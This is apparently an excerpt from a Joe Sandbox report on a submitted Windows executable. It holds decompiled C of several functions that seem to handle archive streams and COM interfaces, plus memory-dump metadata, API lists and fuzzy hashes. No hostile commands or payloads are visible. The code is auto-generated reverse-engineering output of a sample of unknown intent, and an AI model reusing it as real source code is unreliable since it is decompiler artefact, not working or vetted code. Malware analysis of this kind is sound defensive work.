                                          																_t244 = E00404BFA(_t270,  *((intOrPtr*)(_t348 - 0x48)));
                                          																__eflags = _t244;
                                          																if(_t244 != 0) {
                                          																	goto L48;
                                          																}
                                          																E00401D1B(_t344 + 0xe4,  *0x42027c);
                                          																E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
                                          																E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
                                          																E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
                                          																 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
                                          																 *(_t348 - 4) = 0xa;
                                          																L45:
                                          																_t270 = 0x80004005;
                                          																goto L46;
                                          															} else {
                                          																_t346 = _t344 + 0x28;
                                          																E00401D7A(_t346, _t348 - 0x48);
                                          																__eflags =  *(_t348 + 0xb) - _t270;
                                          																_t315 =  *_t346;
                                          																if( *(_t348 + 0xb) == _t270) {
                                          																	__eflags = 0;
                                          																	E0040483F(_t315, 0, _t270,  *(_t348 + 0xc));
                                          																} else {
                                          																	E0040494E(_t315);
                                          																}
                                          																E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
                                          																E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
                                          																 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
                                          																 *(_t348 - 4) = 8;
                                          																L46:
                                          																E004042D6();
                                          																 *(_t348 - 4) = 2;
                                          																E004042AD(_t348 - 0x3c);
                                          																L47:
                                          																 *(_t348 - 4) = 1;
                                          																E00405E34(_t348 - 0x28);
                                          																E00403A9C( *(_t348 - 0x18));
                                          																 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                                          																E00405E34(_t348 - 0x58);
                                          																_t195 = _t270;
                                          																goto L62;
                                          															}
                                          														}
                                          														 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
                                          														 *(_t348 - 4) = 5;
                                          														goto L45;
                                          													}
                                          													__eflags = _t208 - 0x40;
                                          													if(_t208 != 0x40) {
                                          														goto L18;
                                          													}
                                          													_t209 = _t344 + 0x38;
                                          													 *(_t348 + 0xc) = _t209;
                                          													 *_t209 =  *((intOrPtr*)(_t348 - 0x20));
                                          													_t289 =  *((intOrPtr*)(_t348 - 0x1c));
                                          													goto L30;
                                          												}
                                          											}
                                          											 *(_t348 - 4) = 2;
                                          											E00405E34(_t348 - 0x74);
                                          											 *(_t348 - 4) = 1;
                                          											E00405E34(_t348 - 0x28);
                                          											E00403A9C( *(_t348 - 0x18));
                                          											 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                                          											E00405E34(_t348 - 0x58);
                                          											_t195 = _t340;
                                          											goto L62;
                                          										}
                                          										L18:
                                          										_t270 = 0x80004005;
                                          										goto L47;
                                          									}
                                          									_t198 =  *((intOrPtr*)(_t344 + 0x64));
                                          									goto L20;
                                          								}
                                          								L14:
                                          								_t270 = _t197;
                                          								goto L47;
                                          							}
                                          							E00403A9C( *(_t348 - 0x18));
                                          							_t347 = 0x80004005;
                                          							goto L10;
                                          						}
                                          						E00401D7A(_t348 - 0x18, _t344 + 0x50);
                                          						goto L12;
                                          					} else {
                                          						_t347 = _t187;
                                          						L10:
                                          						 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                                          						E00405E34(_t348 - 0x58);
                                          						_t195 = _t347;
                                          						L62:
                                          						 *[fs:0x0] =  *((intOrPtr*)(_t348 - 0xc));
                                          						return _t195;
                                          					}
                                          				}
                                          				_t195 = 0x80004004;
                                          				goto L62;
                                          			}































                                          0x00402993
                                          0x0040299b
                                          0x004029a0
                                          0x00000000
                                          0x004029a0
                                          0x00402920
                                          0x00402920
                                          0x00000000
                                          0x00402920
                                          0x00402914
                                          0x00000000
                                          0x00402914
                                          0x00402907
                                          0x00402907
                                          0x00000000
                                          0x00402907
                                          0x004028a9
                                          0x004028af
                                          0x00000000
                                          0x004028af
                                          0x00402898
                                          0x00000000
                                          0x00402870
                                          0x00402870
                                          0x004028b4
                                          0x004028b4
                                          0x004028bb
                                          0x004028c0
                                          0x00402cda
                                          0x00402ce0
                                          0x00402ce8
                                          0x00402ce8
                                          0x0040286e
                                          0x00402832
                                          0x00000000

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00402812
                                            • Part of subcall function 00402D80: EnterCriticalSection.KERNEL32(?,?,?,004095B9), ref: 00402D85
                                            • Part of subcall function 00402D80: LeaveCriticalSection.KERNEL32(?,?,?,?,004095B9), ref: 00402D8F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterH_prologLeave
                                          • String ID:
                                          • API String ID: 367238759-0
                                          • Opcode ID: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
                                          • Instruction ID: 6b86c84e82b28a82bfdc9d9b9477fa58d6923614df4f06b31c284573bb568367
                                          • Opcode Fuzzy Hash: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
                                          • Instruction Fuzzy Hash: 14F1AD30900249DFCF14EFA5C989ADEBBB4AF54318F14806EE445B72E2DB789A45CF19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E00408A3B(intOrPtr __ecx) {
                                          				intOrPtr _t181;
                                          				signed int _t184;
                                          				signed int* _t187;
                                          				intOrPtr _t188;
                                          				signed int* _t191;
                                          				signed int* _t193;
                                          				void* _t194;
                                          				signed int* _t195;
                                          				void* _t197;
                                          				signed int* _t198;
                                          				void* _t200;
                                          				signed int* _t201;
                                          				intOrPtr _t205;
                                          				signed int* _t207;
                                          				signed int* _t208;
                                          				signed int* _t209;
                                          				intOrPtr* _t213;
                                          				intOrPtr* _t215;
                                          				intOrPtr _t216;
                                          				intOrPtr* _t217;
                                          				intOrPtr* _t220;
                                          				signed int* _t222;
                                          				signed int* _t223;
                                          				signed int* _t224;
                                          				intOrPtr* _t232;
                                          				signed int* _t234;
                                          				signed int* _t235;
                                          				signed int* _t236;
                                          				intOrPtr* _t243;
                                          				signed int* _t245;
                                          				signed int* _t246;
                                          				signed int* _t247;
                                          				intOrPtr _t255;
                                          				signed int _t266;
                                          				signed int _t307;
                                          				signed int _t313;
                                          				intOrPtr _t317;
                                          				signed int** _t319;
                                          				intOrPtr _t320;
                                          				void* _t322;
                                          
                                          				E00413954(E00419B47, _t322);
                                          				_push(_t313);
                                          				 *((intOrPtr*)(_t322 - 0x20)) = __ecx;
                                          				E00408A27(__ecx);
                                          				if( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0xc)) + 8)) < 0x20) {
                                          					while(1) {
                                          						_t317 =  *((intOrPtr*)(_t322 + 0xc));
                                          						_t307 = 1;
                                          						_t313 = _t313 | 0xffffffff;
                                          						_t181 =  *((intOrPtr*)(_t317 + 8));
                                          						 *(_t322 - 0x24) = _t313;
                                          						if(_t181 < _t307) {
                                          							goto L6;
                                          						}
                                          						L4:
                                          						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
                                          						if(_t266 >= _t181) {
                                          							L76:
                                          							 *((char*)( *((intOrPtr*)(_t322 - 0x20)) + 0x30)) = _t266 & 0xffffff00 |  *( *((intOrPtr*)(_t322 - 0x20)) + 8) != 0x00000000;
                                          							_t184 = 0;
                                          							goto L77;
                                          						}
                                          						 *(_t322 - 0x24) =  *( *((intOrPtr*)(_t317 + 0xc)) + (_t181 - _t266) * 4 - 4);
                                          						L7:
                                          						if(_t266 != 0) {
                                          							 *(_t322 - 0x38) = 0;
                                          							 *((short*)(_t322 - 0x36)) = 0;
                                          							_t319 =  *( *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x20)) + 0xc)) + _t266 * 4 - 4);
                                          							_t187 =  *_t319;
                                          							 *(_t322 - 4) = _t307;
                                          							_t188 =  *((intOrPtr*)( *_t187 + 0x20))(_t187, _t307, _t322 - 0x38);
                                          							if(_t188 != 0) {
                                          								L35:
                                          								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                                          								_t320 = _t188;
                                          								E00405E34(_t322 - 0x38);
                                          								L71:
                                          								_t184 = _t320;
                                          								goto L77;
                                          							}
                                          							if( *(_t322 - 0x38) != 0x13) {
                                          								L75:
                                          								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                                          								_t266 = _t322 - 0x38;
                                          								E00405E34(_t266);
                                          								goto L76;
                                          							}
                                          							_t191 =  *_t319;
                                          							_t313 =  *(_t322 - 0x30);
                                          							_t188 =  *((intOrPtr*)( *_t191 + 0x14))(_t191, _t322 - 0x3c);
                                          							if(_t188 != 0) {
                                          								goto L35;
                                          							}
                                          							if(_t313 >=  *((intOrPtr*)(_t322 - 0x3c))) {
                                          								goto L75;
                                          							}
                                          							 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                                          							E00405E34(_t322 - 0x38);
                                          							 *(_t322 - 0x10) = 0;
                                          							_t193 =  *_t319;
                                          							_t266 =  *_t193;
                                          							 *(_t322 - 4) = 2;
                                          							_t194 =  *_t266(_t193, 0x41b228, _t322 - 0x10);
                                          							_t195 =  *(_t322 - 0x10);
                                          							if(_t194 != 0 || _t195 == 0) {
                                          								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                                          								goto L52;
                                          							} else {
                                          								 *(_t322 - 0x14) = 0;
                                          								_t266 =  *_t195;
                                          								 *(_t322 - 4) = 3;
                                          								_t197 =  *((intOrPtr*)(_t266 + 0xc))(_t195, _t313, _t322 - 0x14);
                                          								_t198 =  *(_t322 - 0x14);
                                          								if(_t197 != 0 || _t198 == 0) {
                                          									 *(_t322 - 4) = 2;
                                          									goto L49;
                                          								} else {
                                          									 *(_t322 - 0x18) = 0;
                                          									_t266 =  *_t198;
                                          									 *(_t322 - 4) = 4;
                                          									_t200 =  *_t266(_t198, 0x41b2f8, _t322 - 0x18);
                                          									_t201 =  *(_t322 - 0x18);
                                          									if(_t200 != 0 || _t201 == 0) {
                                          										 *(_t322 - 4) = 3;
                                          										goto L46;
                                          									} else {
                                          										E00408EA0(_t322 - 0x78);
                                          										_push(_t322 - 0x74);
                                          										_push(_t313);
                                          										 *(_t322 - 4) = 5;
                                          										_t205 = E0040836D(_t319);
                                          										 *((intOrPtr*)(_t322 - 0x28)) = _t205;
                                          										if(_t205 != 0) {
                                          											 *(_t322 - 4) = 4;
                                          											E004038C2(_t322 - 0x78);
                                          											_t207 =  *(_t322 - 0x18);
                                          											 *(_t322 - 4) = 3;
                                          											if(_t207 != 0) {
                                          												 *((intOrPtr*)( *_t207 + 8))(_t207);
                                          											}
                                          											_t208 =  *(_t322 - 0x14);
                                          											 *(_t322 - 4) = 2;
                                          											if(_t208 != 0) {
                                          												 *((intOrPtr*)( *_t208 + 8))(_t208);
                                          											}
                                          											_t209 =  *(_t322 - 0x10);
                                          											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                                          											if(_t209 != 0) {
                                          												 *((intOrPtr*)( *_t209 + 8))(_t209);
                                          											}
                                          											_t184 =  *((intOrPtr*)(_t322 - 0x28));
                                          											goto L77;
                                          										}
                                          										 *((intOrPtr*)(_t322 - 0x1c)) = 0;
                                          										_t213 =  *((intOrPtr*)(_t322 + 0x1c));
                                          										 *(_t322 - 4) = 6;
                                          										 *((intOrPtr*)( *_t213))(_t213, 0x41b218, _t322 - 0x1c);
                                          										_t215 =  *((intOrPtr*)(_t322 - 0x1c));
                                          										if(_t215 != 0) {
                                          											 *((intOrPtr*)( *_t215 + 0xc))(_t215,  *((intOrPtr*)(_t322 - 0x74)));
                                          										}
                                          										 *(_t322 - 0x58) = _t313;
                                          										_t216 = E00408524(_t322 - 0x78,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *(_t322 - 0x18), 0,  *((intOrPtr*)(_t322 + 0x1c)));
                                          										 *((intOrPtr*)(_t322 - 0x28)) = _t216;
                                          										if(_t216 == 1) {
                                          											_t217 =  *((intOrPtr*)(_t322 - 0x1c));
                                          											 *(_t322 - 4) = 5;
                                          											if(_t217 != 0) {
                                          												 *((intOrPtr*)( *_t217 + 8))(_t217);
                                          											}
                                          											_t266 = _t322 - 0x78;
                                          											 *(_t322 - 4) = 4;
                                          											E004038C2(_t266);
                                          											_t201 =  *(_t322 - 0x18);
                                          											 *(_t322 - 4) = 3;
                                          											L46:
                                          											if(_t201 != 0) {
                                          												_t266 =  *_t201;
                                          												 *((intOrPtr*)(_t266 + 8))(_t201);
                                          											}
                                          											_t198 =  *(_t322 - 0x14);
                                          											 *(_t322 - 4) = 2;
                                          											L49:
                                          											if(_t198 != 0) {
                                          												_t266 =  *_t198;
                                          												 *((intOrPtr*)(_t266 + 8))(_t198);
                                          											}
                                          											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                                          											_t195 =  *(_t322 - 0x10);
                                          											L52:
                                          											if(_t195 != 0) {
                                          												_t266 =  *_t195;
                                          												 *((intOrPtr*)(_t266 + 8))(_t195);
                                          											}
                                          											goto L76;
                                          										} else {
                                          											if(_t216 != 0) {
                                          												_t220 =  *((intOrPtr*)(_t322 - 0x1c));
                                          												 *(_t322 - 4) = 5;
                                          												if(_t220 != 0) {
                                          													 *((intOrPtr*)( *_t220 + 8))(_t220);
                                          												}
                                          												 *(_t322 - 4) = 4;
                                          												E004038C2(_t322 - 0x78);
                                          												_t222 =  *(_t322 - 0x18);
                                          												 *(_t322 - 4) = 3;
                                          												if(_t222 != 0) {
                                          													 *((intOrPtr*)( *_t222 + 8))(_t222);
                                          												}
                                          												_t223 =  *(_t322 - 0x14);
                                          												 *(_t322 - 4) = 2;
                                          												if(_t223 != 0) {
                                          													 *((intOrPtr*)( *_t223 + 8))(_t223);
                                          												}
                                          												_t224 =  *(_t322 - 0x10);
                                          												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                                          												if(_t224 != 0) {
                                          													 *((intOrPtr*)( *_t224 + 8))(_t224);
                                          												}
                                          												_t184 =  *((intOrPtr*)(_t322 - 0x28));
                                          												goto L77;
                                          											}
                                          											_push(_t322 - 0x4c);
                                          											_push(_t322 - 0x54);
                                          											_push(_t313);
                                          											_t320 = E0040848C(_t319);
                                          											if(_t320 != 0) {
                                          												_t232 =  *((intOrPtr*)(_t322 - 0x1c));
                                          												 *(_t322 - 4) = 5;
                                          												if(_t232 != 0) {
                                          													 *((intOrPtr*)( *_t232 + 8))(_t232);
                                          												}
                                          												 *(_t322 - 4) = 4;
                                          												E004038C2(_t322 - 0x78);
                                          												_t234 =  *(_t322 - 0x18);
                                          												 *(_t322 - 4) = 3;
                                          												if(_t234 != 0) {
                                          													 *((intOrPtr*)( *_t234 + 8))(_t234);
                                          												}
                                          												_t235 =  *(_t322 - 0x14);
                                          												 *(_t322 - 4) = 2;
                                          												if(_t235 != 0) {
                                          													 *((intOrPtr*)( *_t235 + 8))(_t235);
                                          												}
                                          												_t236 =  *(_t322 - 0x10);
                                          												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                                          												if(_t236 != 0) {
                                          													 *((intOrPtr*)( *_t236 + 8))(_t236);
                                          												}
                                          												goto L71;
                                          											}
                                          											_push(_t322 - 0x78);
                                          											E004093F0( *((intOrPtr*)(_t322 - 0x20)));
                                          											_t243 =  *((intOrPtr*)(_t322 - 0x1c));
                                          											 *(_t322 - 4) = 5;
                                          											if(_t243 != 0) {
                                          												 *((intOrPtr*)( *_t243 + 8))(_t243);
                                          											}
                                          											 *(_t322 - 4) = 4;
                                          											E004038C2(_t322 - 0x78);
                                          											_t245 =  *(_t322 - 0x18);
                                          											 *(_t322 - 4) = 3;
                                          											if(_t245 != 0) {
                                          												 *((intOrPtr*)( *_t245 + 8))(_t245);
                                          											}
                                          											_t246 =  *(_t322 - 0x14);
                                          											 *(_t322 - 4) = 2;
                                          											if(_t246 != 0) {
                                          												 *((intOrPtr*)( *_t246 + 8))(_t246);
                                          											}
                                          											_t247 =  *(_t322 - 0x10);
                                          											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                                          											if(_t247 != 0) {
                                          												 *((intOrPtr*)( *_t247 + 8))(_t247);
                                          											}
                                          											while(1) {
                                          												_t317 =  *((intOrPtr*)(_t322 + 0xc));
                                          												_t307 = 1;
                                          												_t313 = _t313 | 0xffffffff;
                                          												_t181 =  *((intOrPtr*)(_t317 + 8));
                                          												 *(_t322 - 0x24) = _t313;
                                          												if(_t181 < _t307) {
                                          													goto L6;
                                          												}
                                          												goto L4;
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						E00408EA0(_t322 - 0xb4);
                                          						 *(_t322 - 4) = 0;
                                          						E00401D7A(_t322 - 0xb0,  *((intOrPtr*)(_t322 + 0x18)));
                                          						 *(_t322 - 0x94) = _t313;
                                          						_t255 = E00408902(_t322 - 0xb4,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *((intOrPtr*)(_t322 + 0x10)),  *((intOrPtr*)(_t322 + 0x14)),  *((intOrPtr*)(_t322 + 0x1c))); // executed
                                          						_t320 = _t255;
                                          						if(_t320 != 0) {
                                          							 *(_t322 - 4) = _t313;
                                          							E004038C2(_t322 - 0xb4);
                                          							goto L71;
                                          						}
                                          						_push(_t322 - 0xb4);
                                          						E004093F0( *((intOrPtr*)(_t322 - 0x20)));
                                          						 *(_t322 - 4) = _t313;
                                          						E004038C2(_t322 - 0xb4);
                                          						continue;
                                          						L6:
                                          						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
                                          						if(_t266 >= 0x20) {
                                          							goto L76;
                                          						}
                                          						goto L7;
                                          					}
                                          				} else {
                                          					_t184 = 0x80004001;
                                          					L77:
                                          					 *[fs:0x0] =  *((intOrPtr*)(_t322 - 0xc));
                                          					return _t184;
                                          				}
                                          			}












































                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                                          • Instruction ID: 34c7193a5b50bb33ce0ba2a09d23f7b106f418ab12413814a78bbf0ce5505d58
                                          • Opcode Fuzzy Hash: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                                          • Instruction Fuzzy Hash: 62E17F70A00249DFCF10DFA4C988AAEBBB4AF58314F2445AEE495F72D1CB389E45CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E0040EA0B(intOrPtr* __ecx, signed int __edx, void* __eflags) {
                                          				intOrPtr _t191;
                                          				intOrPtr* _t197;
                                          				intOrPtr _t202;
                                          				void* _t220;
                                          				void* _t227;
                                          				intOrPtr _t267;
                                          				signed int _t271;
                                          				intOrPtr* _t273;
                                          				intOrPtr* _t277;
                                          				intOrPtr* _t279;
                                          				intOrPtr* _t283;
                                          				void* _t284;
                                          				void* _t289;
                                          
                                          				_t289 = __eflags;
                                          				_t271 = __edx;
                                          				E00413954(E0041A72D, _t284);
                                          				_t273 = __ecx;
                                          				E004032A8(_t284 - 0x5c, 8);
                                          				 *((intOrPtr*)(_t284 - 0x5c)) = 0x41b694;
                                          				 *(_t284 - 4) =  *(_t284 - 4) & 0x00000000;
                                          				E004032A8(_t284 - 0xd8, 1);
                                          				 *((intOrPtr*)(_t284 - 0xd8)) = 0x41b748;
                                          				E004032A8(_t284 - 0xc4, 4);
                                          				 *((intOrPtr*)(_t284 - 0xc4)) = 0x41b684;
                                          				 *(_t284 - 4) = 2;
                                          				E00402155(_t284 - 0x30);
                                          				 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
                                          				E004032A8(_t284 - 0x84, 4);
                                          				 *((intOrPtr*)(_t284 - 0x84)) = 0x41b684;
                                          				E004032A8(_t284 - 0x9c, 8);
                                          				 *((intOrPtr*)(_t284 - 0x9c)) = 0x41b694;
                                          				E004032A8(_t284 - 0xb0, 1);
                                          				 *((intOrPtr*)(_t284 - 0xb0)) = 0x41b748;
                                          				E004032A8(_t284 - 0x70, 4);
                                          				 *((intOrPtr*)(_t284 - 0x70)) = 0x41b684;
                                          				_t277 =  *((intOrPtr*)(_t284 + 0x10));
                                          				 *(_t284 - 4) = 7;
                                          				E0040E86B(__ecx, __edx, 0, _t277, _t284 - 0x5c, _t284 - 0xd8, _t284 - 0xc4, _t284 - 0x30, _t284 - 0x84, _t284 - 0x9c, _t284 - 0xb0, _t284 - 0x70);
                                          				 *(_t284 - 0x14) =  *(_t284 - 0x14) & 0x00000000;
                                          				E0040AC6A(_t284 - 0x164, _t289, 1);
                                          				_t227 =  *_t277 +  *((intOrPtr*)(_t284 + 8));
                                          				asm("adc esi, [ebp+0xc]");
                                          				 *(_t284 + 0xc) =  *(_t284 + 0xc) & 0x00000000;
                                          				 *((intOrPtr*)(_t284 - 0x34)) =  *((intOrPtr*)(_t277 + 4));
                                          				if( *((intOrPtr*)(_t284 - 0x28)) <= 0) {
                                          					L17:
                                          					 *(_t284 - 4) = 7;
                                          					E0040C380(_t284 - 0x164, _t301); // executed
                                          					 *(_t284 - 4) = 6;
                                          					E004042AD(_t284 - 0x70);
                                          					 *(_t284 - 4) = 5;
                                          					E004042AD(_t284 - 0xb0);
                                          					 *(_t284 - 4) = 4;
                                          					E004042AD(_t284 - 0x9c);
                                          					 *(_t284 - 4) = 3;
                                          					E004042AD(_t284 - 0x84);
                                          					 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
                                          					 *(_t284 - 4) = 0xc;
                                          					_t279 = 0;
                                          					L18:
                                          					E004042D6();
                                          					 *(_t284 - 4) = 2;
                                          					E004042AD(_t284 - 0x30);
                                          					 *(_t284 - 4) = 1;
                                          					E004042AD(_t284 - 0xc4);
                                          					 *(_t284 - 4) =  *(_t284 - 4) & 0x00000000;
                                          					E004042AD(_t284 - 0xd8);
                                          					 *(_t284 - 4) =  *(_t284 - 4) | 0xffffffff;
                                          					E004042AD(_t284 - 0x5c);
                                          					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0xc));
                                          					return _t279;
                                          				} else {
                                          					goto L1;
                                          				}
                                          				while(1) {
                                          					L1:
                                          					 *(_t284 - 0x40) =  *(_t284 - 0x40) & 0x00000000;
                                          					 *(_t284 - 0x3c) =  *(_t284 - 0x3c) & 0x00000000;
                                          					 *((intOrPtr*)(_t284 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t284 - 0x24)) +  *(_t284 + 0xc) * 4));
                                          					 *((intOrPtr*)(_t284 - 0x44)) = 0x41b818;
                                          					_push(_t284 - 0x44);
                                          					 *(_t284 - 4) = 9;
                                          					E0040FA43( *((intOrPtr*)(_t284 + 0x14)));
                                          					 *(_t284 - 4) = 8;
                                          					 *((intOrPtr*)(_t284 - 0x44)) = 0x41b818;
                                          					E00403A9C( *(_t284 - 0x3c));
                                          					_t191 =  *((intOrPtr*)(_t284 + 0x14));
                                          					_t282 =  *( *((intOrPtr*)(_t191 + 0xc)) +  *(_t191 + 8) * 4 - 4);
                                          					 *(_t284 - 0x10) =  *( *((intOrPtr*)(_t191 + 0xc)) +  *(_t191 + 8) * 4 - 4);
                                          					 *(_t284 - 0x1c) = E0040C281( *((intOrPtr*)(_t284 + 0x10)));
                                          					_t256 =  *(_t284 - 0x1c);
                                          					if( *(_t284 - 0x1c) !=  *(_t284 - 0x1c) || 0 != _t271) {
                                          						E0040DB47(_t256);
                                          					}
                                          					E004076D5(_t282,  *(_t284 - 0x1c));
                                          					_push(0x14);
                                          					_t197 = E00403A76();
                                          					_t283 = 0;
                                          					if(_t197 != 0) {
                                          						 *((intOrPtr*)(_t197 + 4)) = 0;
                                          						 *_t197 = 0x41b824;
                                          						_t283 = _t197;
                                          					}
                                          					_t294 = _t283;
                                          					 *((intOrPtr*)(_t284 - 0x88)) = _t283;
                                          					if(_t283 != 0) {
                                          						 *((intOrPtr*)( *_t283 + 4))(_t283);
                                          					}
                                          					_t271 =  *(_t284 - 0x14);
                                          					 *(_t283 + 0x10) =  *(_t283 + 0x10) & 0x00000000;
                                          					 *((intOrPtr*)(_t283 + 8)) =  *((intOrPtr*)( *(_t284 - 0x10) + 8));
                                          					 *(_t284 - 4) = 0xa;
                                          					 *(_t283 + 0xc) =  *(_t284 - 0x1c);
                                          					_t202 = E0040AD19(_t284 - 0x164, _t294,  *_t273, _t227,  *((intOrPtr*)(_t284 - 0x34)),  *(_t284 - 0x50) + _t271 * 8,  *((intOrPtr*)(_t284 + 0x10)), _t283, 0); // executed
                                          					 *((intOrPtr*)(_t284 - 0x48)) = _t202;
                                          					if(_t202 != 0) {
                                          						break;
                                          					}
                                          					if( *((char*)( *((intOrPtr*)(_t284 + 0x10)) + 0x54)) != 0) {
                                          						_t271 =  *(_t284 - 0x1c);
                                          						_t220 = E004133B0( *((intOrPtr*)( *(_t284 - 0x10) + 8)), _t271);
                                          						_t270 =  *((intOrPtr*)(_t284 + 0x10));
                                          						if(_t220 !=  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x50))) {
                                          							E0040DB47(_t270);
                                          						}
                                          					}
                                          					 *(_t284 - 0x10) =  *(_t284 - 0x10) & 0x00000000;
                                          					if( *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x30)) <= 0) {
                                          						L14:
                                          						 *(_t284 - 4) = 8;
                                          						if(_t283 != 0) {
                                          							 *((intOrPtr*)( *_t283 + 8))(_t283);
                                          						}
                                          						 *(_t284 + 0xc) =  *(_t284 + 0xc) + 1;
                                          						_t301 =  *(_t284 + 0xc) -  *((intOrPtr*)(_t284 - 0x28));
                                          						if( *(_t284 + 0xc) <  *((intOrPtr*)(_t284 - 0x28))) {
                                          							continue;
                                          						} else {
                                          							goto L17;
                                          						}
                                          					} else {
                                          						do {
                                          							_t271 =  *(_t284 - 0x50);
                                          							 *(_t284 - 0x14) =  *(_t284 - 0x14) + 1;
                                          							_t267 =  *((intOrPtr*)(( *(_t284 - 0x14) << 3) + _t271));
                                          							_t227 = _t227 + _t267;
                                          							asm("adc [ebp-0x34], eax");
                                          							 *((intOrPtr*)(_t273 + 0x48)) =  *((intOrPtr*)(_t273 + 0x48)) + _t267;
                                          							asm("adc [edi+0x4c], eax");
                                          							 *(_t284 - 0x10) =  *(_t284 - 0x10) + 1;
                                          						} while ( *(_t284 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x30)));
                                          						goto L14;
                                          					}
                                          				}
                                          				__eflags = _t283;
                                          				 *(_t284 - 4) = 8;
                                          				if(__eflags != 0) {
                                          					 *((intOrPtr*)( *_t283 + 8))(_t283);
                                          				}
                                          				 *(_t284 - 4) = 7;
                                          				E0040C380(_t284 - 0x164, __eflags);
                                          				 *(_t284 - 4) = 6;
                                          				E004042AD(_t284 - 0x70);
                                          				 *(_t284 - 4) = 5;
                                          				E004042AD(_t284 - 0xb0);
                                          				 *(_t284 - 4) = 4;
                                          				E004042AD(_t284 - 0x9c);
                                          				 *(_t284 - 4) = 3;
                                          				E004042AD(_t284 - 0x84);
                                          				 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
                                          				_t279 =  *((intOrPtr*)(_t284 - 0x48));
                                          				 *(_t284 - 4) = 0xb;
                                          				goto L18;
                                          			}
















                                          0x0040ec09
                                          0x00000000
                                          0x00000000
                                          0x0040ec16
                                          0x0040ec1b
                                          0x0040ec21
                                          0x0040ec26
                                          0x0040ec2c
                                          0x0040ec2e
                                          0x0040ec2e
                                          0x0040ec2c
                                          0x0040ec36
                                          0x0040ec3e
                                          0x0040ec6c
                                          0x0040ec6e
                                          0x0040ec72
                                          0x0040ec77
                                          0x0040ec77
                                          0x0040ec7a
                                          0x0040ec80
                                          0x0040ec83
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040ec40
                                          0x0040ec40
                                          0x0040ec43
                                          0x0040ec49
                                          0x0040ec4c
                                          0x0040ec53
                                          0x0040ec55
                                          0x0040ec58
                                          0x0040ec5b
                                          0x0040ec5e
                                          0x0040ec67
                                          0x00000000
                                          0x0040ec40
                                          0x0040ec3e
                                          0x0040ed2f
                                          0x0040ed31
